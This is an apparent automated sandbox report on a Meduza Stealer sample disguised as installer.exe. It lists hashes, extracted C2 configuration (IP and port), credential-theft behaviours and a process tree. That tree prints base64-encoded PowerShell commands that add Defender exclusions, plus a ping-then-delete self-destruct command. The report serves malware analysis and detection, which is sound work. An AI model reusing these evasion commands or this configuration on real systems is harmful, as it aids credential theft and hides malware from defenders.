Analysis
-
max time kernel
100s -
max time network
104s -
platform
windows10-1703_x64 -
resource
win10-20240404-en -
resource tags
arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system -
submitted
10-10-2024 13:57
Static task
static1
Behavioral task
behavioral1
Sample
installer.exe
Resource
win10-20240404-en
Behavioral task
behavioral2
Sample
installer.exe
Resource
win7-20240903-en
Behavioral task
behavioral3
Sample
installer.exe
Resource
win10v2004-20241007-en
General
-
Target
installer.exe
-
Size
18.7MB
-
MD5
9cd846ea50a04e3d926b8adbfdcb9dff
-
SHA1
1c2d7e2e672e8aa64853f8a2b6b0ff7e97117465
-
SHA256
156cc4ef32137f0f9a8df03c32c1b0b506c72355c08bbf6f8c07279a53a7922b
-
SHA512
1b60385c3df8a331f3824954532262d63c7218459e1d7241b37c652520510e68d300d620b31f74492942a705434c740f336c44482ddebc1c04db60e4b50a933f
-
SSDEEP
98304:eI0CniMX77777773773W/lcCjQI7wnHsv8pMCTzSAhmyhJONL+L8JCE8fh9mdJOW:Nii77777773773WICRPZQ2isH
Malware Config
Extracted
meduza
79.137.202.152
-
anti_dbg
true
-
anti_vm
false
-
build_name
OurOld2
-
extensions
.txt;.doc;.docx;.pdf;.xls;.xlsx;.log;.db;.sqlite
-
grabber_max_size
1.048576e+06
-
port
15666
-
self_destruct
true
Signatures
-
Meduza Stealer payload 2 IoCs
resource yara_rule behavioral1/memory/1212-114-0x0000000140000000-0x000000014013B000-memory.dmp family_meduza behavioral1/memory/1212-116-0x0000000140000000-0x000000014013B000-memory.dmp family_meduza -
Downloads MZ/PE file
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000\Control Panel\International\Geo\Nation mglonklmabolojhs.exe -
Executes dropped EXE 2 IoCs
pid Process 3628 mglonklmabolojhs.exe 1212 mglonklmabolojhs.exe -
Loads dropped DLL 1 IoCs
pid Process 3628 mglonklmabolojhs.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses Microsoft Outlook profiles 1 TTPs 5 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 mglonklmabolojhs.exe Key opened \REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000\SOFTWARE\Microsoft\Office\12.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 mglonklmabolojhs.exe Key opened \REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000\SOFTWARE\Microsoft\Office\14.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 mglonklmabolojhs.exe Key opened \REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 mglonklmabolojhs.exe Key opened \REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 mglonklmabolojhs.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
pid Process 1484 powershell.exe 4960 powershell.exe -
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 5 api.ipify.org 6 api.ipify.org -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 3628 set thread context of 1212 3628 mglonklmabolojhs.exe 79 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 4724 cmd.exe 5084 PING.EXE -
NTFS ADS 1 IoCs
description ioc Process File opened for modification C:\Users\Admin\obegjgmrridxiphk\mglonklmabolojhs.exe:a.dll mglonklmabolojhs.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 5084 PING.EXE -
Suspicious behavior: EnumeratesProcesses 12 IoCs
pid Process 1484 powershell.exe 1484 powershell.exe 1484 powershell.exe 4960 powershell.exe 4960 powershell.exe 4960 powershell.exe 3628 mglonklmabolojhs.exe 3628 mglonklmabolojhs.exe 3628 mglonklmabolojhs.exe 3628 mglonklmabolojhs.exe 1212 mglonklmabolojhs.exe 1212 mglonklmabolojhs.exe -
Suspicious use of AdjustPrivilegeToken 46 IoCs
description pid Process Token: SeDebugPrivilege 1484 powershell.exe Token: SeIncreaseQuotaPrivilege 1484 powershell.exe Token: SeSecurityPrivilege 1484 powershell.exe Token: SeTakeOwnershipPrivilege 1484 powershell.exe Token: SeLoadDriverPrivilege 1484 powershell.exe Token: SeSystemProfilePrivilege 1484 powershell.exe Token: SeSystemtimePrivilege 1484 powershell.exe Token: SeProfSingleProcessPrivilege 1484 powershell.exe Token: SeIncBasePriorityPrivilege 1484 powershell.exe Token: SeCreatePagefilePrivilege 1484 powershell.exe Token: SeBackupPrivilege 1484 powershell.exe Token: SeRestorePrivilege 1484 powershell.exe Token: SeShutdownPrivilege 1484 powershell.exe Token: SeDebugPrivilege 1484 powershell.exe Token: SeSystemEnvironmentPrivilege 1484 powershell.exe Token: SeRemoteShutdownPrivilege 1484 powershell.exe Token: SeUndockPrivilege 1484 powershell.exe Token: SeManageVolumePrivilege 1484 powershell.exe Token: 33 1484 powershell.exe Token: 34 1484 powershell.exe Token: 35 1484 powershell.exe Token: 36 1484 powershell.exe Token: SeDebugPrivilege 4960 powershell.exe Token: SeIncreaseQuotaPrivilege 4960 powershell.exe Token: SeSecurityPrivilege 4960 powershell.exe Token: SeTakeOwnershipPrivilege 4960 powershell.exe Token: SeLoadDriverPrivilege 4960 powershell.exe Token: SeSystemProfilePrivilege 4960 powershell.exe Token: SeSystemtimePrivilege 4960 powershell.exe Token: SeProfSingleProcessPrivilege 4960 powershell.exe Token: SeIncBasePriorityPrivilege 4960 powershell.exe Token: SeCreatePagefilePrivilege 4960 powershell.exe Token: SeBackupPrivilege 4960 powershell.exe Token: SeRestorePrivilege 4960 powershell.exe Token: SeShutdownPrivilege 4960 powershell.exe Token: SeDebugPrivilege 4960 powershell.exe Token: SeSystemEnvironmentPrivilege 4960 powershell.exe Token: SeRemoteShutdownPrivilege 4960 powershell.exe Token: SeUndockPrivilege 4960 powershell.exe Token: SeManageVolumePrivilege 4960 powershell.exe Token: 33 4960 powershell.exe Token: 34 4960 powershell.exe Token: 35 4960 powershell.exe Token: 36 4960 powershell.exe Token: SeDebugPrivilege 1212 mglonklmabolojhs.exe Token: SeImpersonatePrivilege 1212 mglonklmabolojhs.exe -
Suspicious use of WriteProcessMemory 25 IoCs
description pid Process procid_target PID 4472 wrote to memory of 1484 4472 installer.exe 73 PID 4472 wrote to memory of 1484 4472 installer.exe 73 PID 4472 wrote to memory of 4960 4472 installer.exe 76 PID 4472 wrote to memory of 4960 4472 installer.exe 76 PID 4472 wrote to memory of 3628 4472 installer.exe 78 PID 4472 wrote to memory of 3628 4472 installer.exe 78 PID 3628 wrote to memory of 1212 3628 mglonklmabolojhs.exe 79 PID 3628 wrote to memory of 1212 3628 mglonklmabolojhs.exe 79 PID 3628 wrote to memory of 1212 3628 mglonklmabolojhs.exe 79 PID 3628 wrote to memory of 1212 3628 mglonklmabolojhs.exe 79 PID 3628 wrote to memory of 1212 3628 mglonklmabolojhs.exe 79 PID 3628 wrote to memory of 1212 3628 mglonklmabolojhs.exe 79 PID 3628 wrote to memory of 1212 3628 mglonklmabolojhs.exe 79 PID 3628 wrote to memory of 1212 3628 mglonklmabolojhs.exe 79 PID 3628 wrote to memory of 1212 3628 mglonklmabolojhs.exe 79 PID 3628 wrote to memory of 1212 3628 mglonklmabolojhs.exe 79 PID 3628 wrote to memory of 1212 3628 mglonklmabolojhs.exe 79 PID 3628 wrote to memory of 1212 3628 mglonklmabolojhs.exe 79 PID 3628 wrote to memory of 1212 3628 mglonklmabolojhs.exe 79 PID 3628 wrote to memory of 1212 3628 mglonklmabolojhs.exe 79 PID 3628 wrote to memory of 1212 3628 mglonklmabolojhs.exe 79 PID 1212 wrote to memory of 4724 1212 mglonklmabolojhs.exe 80 PID 1212 wrote to memory of 4724 1212 mglonklmabolojhs.exe 80 PID 4724 wrote to memory of 5084 4724 cmd.exe 82 PID 4724 wrote to memory of 5084 4724 cmd.exe 82 -
outlook_office_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 mglonklmabolojhs.exe -
outlook_win_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 mglonklmabolojhs.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\installer.exe"C:\Users\Admin\AppData\Local\Temp\installer.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:4472 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" "-Command" "$cmd = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('QWRkLU1wUHJlZmVyZW5jZSAtRXhjbHVzaW9uUGF0aCAiQzpcVXNlcnNcQWRtaW5cb2JlZ2pnbXJyaWR4aXBoayI=')); Invoke-Expression $cmd"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1484
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" "-Command" "$cmd = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('QWRkLU1wUHJlZmVyZW5jZSAtRXhjbHVzaW9uUGF0aCAiQzpcVXNlcnNcQWRtaW5cb2JlZ2pnbXJyaWR4aXBoa1xtZ2xvbmtsbWFib2xvamhzLmV4ZSI=')); Invoke-Expression $cmd"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4960
-
-
C:\Users\Admin\obegjgmrridxiphk\mglonklmabolojhs.exe"C:\Users\Admin\obegjgmrridxiphk\mglonklmabolojhs.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3628 -
C:\Users\Admin\obegjgmrridxiphk\mglonklmabolojhs.exe"C:\Users\Admin\obegjgmrridxiphk\mglonklmabolojhs.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- Accesses Microsoft Outlook profiles
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- outlook_office_path
- outlook_win_path
PID:1212 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\obegjgmrridxiphk\mglonklmabolojhs.exe"4⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Suspicious use of WriteProcessMemory
PID:4724 -
C:\Windows\system32\PING.EXEping 1.1.1.1 -n 1 -w 30005⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:5084
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
1Credentials In Files
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD598b836844b319b52cf34f2e7910c8519
SHA1724bf99f8ca3ded93da040d3764a264066cd11cc
SHA256c6d7aed431499274f95c61eb9dbe8cbb5dd86cdb8ba117205ae7f2e053a79f62
SHA51251fe509ebb7456176ec5ecda6e6f595d566644ddf9dc4baac81384398e1d871fba4a90d4d0cea31ab016267b89aa5af863e5df325a1a645a224849ca788475f3
-
Filesize
1KB
MD56d155bba057c788022f9830ce2d87760
SHA1d00f1ff7c2e7145a52f2612bc1930d877cb89f75
SHA256ffb14cab6bd7714d37cbed55c686031f94856640351d1fd4330fe96fa22982ef
SHA512c97af224a3a98ea07381df7d20d11bcdf1112a6dd5d853e5e12d281362139e9397fb785e26d141629cc539ec38cd5824d995bd3c8ae866c16f8f13e2313d55b2
-
Filesize
1B
MD5c4ca4238a0b923820dcc509a6f75849b
SHA1356a192b7913b04c54574d18c28d46e6395428ab
SHA2566b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA5124dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a
-
Filesize
2.6MB
MD598e56fc6276f5ea11ed37de5b40116d3
SHA1882fd2c385eeaffec3881b3262de638ff912f276
SHA2569006378885c4a84699ad0f90dbe7579969e3a1b41f6fd334c4e440d30a15d063
SHA512978c3f3e5e866db2cc59a3474a6b75291b3eba44d445887c2afd50218dce776a650822eb67118481e62411b02102c7e49a1dc99db507d4cca59d0253b5b1a19b